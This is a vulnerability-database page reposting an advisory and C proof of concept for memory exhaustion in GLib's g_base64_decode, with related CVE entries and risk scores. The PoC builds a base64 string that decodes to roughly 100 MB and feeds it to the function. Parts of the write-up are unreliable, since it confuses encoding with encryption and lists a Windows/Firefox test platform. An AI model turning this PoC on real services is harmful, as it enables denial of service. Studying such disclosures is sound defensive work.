📄 GLib Memory Exhaustion

🗓️ 10 Mar 2026 00:00:00Reported by indoushkaType

GLib g_base64_decode may allocate unbounded memory for large inputs, enabling denial of service.

Reporter	Title	Published	Views	Family All 119
ATTACKERKB	CVE-2026-1485	27 Jan 202613:43	–	attackerkb
ATTACKERKB	CVE-2026-1489	27 Jan 202614:26	–	attackerkb
ATTACKERKB	CVE-2026-1484	27 Jan 202613:41	–	attackerkb
AstraLinux	Astra Linux - уязвимость в glib2.0	3 May 202623:59	–	astralinux
AstraLinux	Astra Linux - уязвимость в glib2.0	3 May 202623:59	–	astralinux
AstraLinux	Astra Linux - уязвимость в glib2.0	3 May 202623:59	–	astralinux
CBLMariner	CVE-2026-1484 affecting package glib for versions less than 2.78.6-7	9 Feb 202623:37	–	cbl_mariner
CBLMariner	CVE-2026-1489 affecting package glib for versions less than 2.71.0-10	14 Apr 202618:44	–	cbl_mariner
CBLMariner	CVE-2026-1489 affecting package glib for versions less than 2.78.6-8	10 Mar 202622:56	–	cbl_mariner
Circl	CVE-2026-1484	27 Jan 202616:59	–	circl

=============================================================================================================================================
    | # Title     : Unbounded Base64 Decoding in GLib Leading to Memory Exhaustion                                                              |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.ubuntu.com/                                                                                                     |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/215078/  & CVE-2026-1484, CVE-2026-1485, CVE-2026-1489
    
    [+] Summary    : The g_base64_decode() function in the GLib library fails to enforce input size limits, allowing attackers to input extremely large Base64-encrypted data, resulting in uncontrolled memory allocation.
                     This vulnerability can be exploited by providing a specially crafted, but syntactically correct, Base64 string that is decrypted into an extremely large binary store. 
    				 Upon processing, the function allocates memory proportional to the size of the decrypted output without applying upper limits or quota checks, potentially leading to memory exhaustion (a denial-of-service attack).
                     The provided proof of concept (PoC) demonstrates how to successfully generate and process a large Base64 payload (e.g., decrypting to approximately 100 MB), 
    				 overwhelming the target system's memory and revealing the lack of protection limits in the decryption routine.
                     No memory damage is required; the exploit relies entirely on resource exhaustion.
      
    [+] POC :   gcc exploit_cve_2026_1484.c -o exploit_cve_2026_1484 `pkg-config --cflags --libs glib-2.0`
    
    #include <glib.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    
    char* generate_malicious_base64(size_t decoded_target_size, size_t *out_b64_len) {
    
        size_t full_blocks = decoded_target_size / 3;
        size_t remainder   = decoded_target_size % 3;
    
        size_t b64_len = full_blocks * 4;
        if (remainder) b64_len += 4;
    
        char *buffer = malloc(b64_len + 1);
        if (!buffer) return NULL;
    
        memset(buffer, 'Q', b64_len);
    
        // Proper padding
        if (remainder == 1) {
            buffer[b64_len - 1] = '=';
            buffer[b64_len - 2] = '=';
        } else if (remainder == 2) {
            buffer[b64_len - 1] = '=';
        }
    
        buffer[b64_len] = '\0';
    
        if (out_b64_len) *out_b64_len = b64_len;
        return buffer;
    }
    
    void trigger_vulnerability() {
        printf("[*] Testing CVE-2026-1484 - Large Base64 parsing\n");
    
        size_t decoded_target = 1024 * 1024 * 100;
        size_t base64_len = 0;
    
        char *large_base64 = generate_malicious_base64(decoded_target, &base64_len);
        if (!large_base64) {
            printf("[-] Failed to allocate Base64 buffer\n");
            return;
        }
    
        printf("[+] Generated Base64 input: %zu bytes\n", base64_len);
    
        gsize decoded_len = 0;
        guchar *decoded_data = g_base64_decode(large_base64, &decoded_len);
    
        printf("[+] Decoded output size: %zu bytes\n", decoded_len);
    
        if (decoded_data) g_free(decoded_data);
        free(large_base64);
    
        printf("[*] PoC execution finished\n");
    }
    
    int main() {
        trigger_vulnerability();
        return 0;
    }
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

10 Mar 2026 00:00Current

5.8Medium risk

Vulners AI Score5.8

CVSS 3.15.4

EPSS0.0002

SSVC